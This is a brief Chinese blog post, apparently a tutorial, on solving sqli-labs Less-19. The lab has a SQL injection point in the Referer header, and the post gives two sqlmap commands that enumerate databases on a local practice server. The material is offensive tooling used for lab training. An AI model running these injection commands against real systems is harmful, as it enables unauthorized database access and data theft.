您现在的位置是：首页

sql-labs 18-20（sqlmap 注入）-Less19：单引号、引用类型注入点

最编程 2024-03-25 19:32:10

...

跟十八关差不多，只是存在注入点的HTTP请求头参数不一样，这里是referer处存在注入点

同样用两种方式：

注意注入点处要跟上“*”符号

python sqlmap.py -r 1.txt --dbs --threads 8 --technique BEST
python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-19/" --referer=" http://127.0.0.1/sqli-labs-master/Less-19/*" --level 4 --dbs --threads 8 --technique BEST

上一篇： MySQL 连接 - 连接过多 - Kara Cloud

下一篇： Docker Hands-On：MySQL 5.7 安装详解（保姆式教程）